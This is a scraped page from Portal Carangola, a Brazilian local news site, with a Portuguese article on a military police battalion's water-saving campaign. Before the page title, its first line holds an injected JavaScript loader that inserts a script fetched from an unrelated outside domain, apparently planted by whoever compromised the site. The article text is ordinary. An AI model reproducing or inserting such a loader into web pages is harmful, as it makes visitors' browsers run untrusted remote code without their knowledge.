;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Programa Mobilização para segurança hídrica. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Programa Mobilização para segurança hídrica.

Estamos enfrentando uma das piores crises de água dos últimos 100 anos, o que exige envolvimento e a participação de todos na preservação dos nossos recursos naturais.
Há que se ressaltar que a hidroeletricidade é responsável por 82% do suprimento total de nergia no Brasil, sendo indiscutíveis os reflexos da crise hídrica na geração de energia elétrica.
Diante da gravidade da situação e considerando que no Estado de Minas Gerais 80% do consumo de água está no âmbito doméstico, torna-se importante uma ação mais ostensiva da Polícia Militar e da sociedade, tanto na redução do consumo de água, quanto na fiscalização e proteção de nossos manaciais.
Nesse mesmo diapasão, a PMMG lançou o Programa “Mobilização para Segurança Hídrica” visando contribuir para o fortalecimento da segurança hídrica por meio da conscientização de todos os Policiais Militares espalhados pelos 853 Municípios mineiros.
Neste contexto, o 47º BPM, em parceria com outros órgãos que guardam correlação com os assuntos de interesse das fontes hídricas, promoverá um cliclo de palestras para todo o seu efetivo. Outrossim, serão realizadas ainda atividades de fiscalização e vistoria das instalações elétricas e hidráulicas dos quarteis da Polícia Militar a fim de detectar e sanar eventuais problemas.
O slogan da campanha será: “Nos 30%, cada PM conta”. O objetivo é a participação efetiva de todos os integrantes da Polícia Militar, bem como de todas as Unidades na redução do consumo de água em pelo menos 30%.

hidrica
ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.